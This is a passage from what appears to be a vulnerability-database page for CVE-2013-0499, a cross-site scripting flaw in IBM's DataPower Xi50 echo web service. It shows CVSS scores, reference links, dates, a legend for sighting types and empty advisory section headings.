              "url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_IBM_Xi50_Echo-WebService_Xss_in_Xml_v10.txt"
            },
            {
              "name": "was-datapower-echo-xss(82221)",
              "refsource": "XF",
              "tags": [],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        }
      },
      "lastModifiedDate": "2017-08-29T01:33Z",
      "publishedDate": "2013-05-28T16:55Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2013-0499 (GCVE-0-2013-0499)

GHSA-R4RQ-634F-573C

VAR-201305-0236

Vendor/product description:

Vulnerability overview/description:

Proof of concept:

XSS XML Proxy

Vulnerable / tested versions:

Vendor contact timeline:

Solution:

Advisory URL:

FKIE_CVE-2013-0499

GSD-2013-0499

Tags

Sightings

Nomenclature